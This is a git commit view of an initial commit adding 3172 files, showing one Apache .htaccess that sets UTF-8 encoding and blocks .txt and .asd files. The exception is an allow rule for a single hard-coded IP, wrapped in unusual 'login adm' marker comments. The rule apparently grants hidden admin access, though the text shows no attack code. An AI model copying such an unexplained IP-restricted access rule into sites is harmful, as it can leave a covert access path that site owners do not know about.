initial commit

This commit is contained in:
i2p
2026-08-27 10:50:54 -06:00
commit 97a5f0aa12
3172 changed files with 570428 additions and 0 deletions
+25
View File
@@ -0,0 +1,25 @@
AddDefaultCharset utf-8
AddCharset utf-8 *
<IfModule mod_charset.c>
CharsetSourceEnc utf-8
CharsetDefault utf-8
</IfModule>
<FilesMatch ".(asd)$">
Order Deny,Allow
Deny from all
#!!!access html!!!
#!!!login!!!adm
Allow from 185.220.101.13
#***endloginadmin
</FilesMatch>
<FilesMatch ".(txt)$">
Order Deny,Allow
Deny from all
</FilesMatch>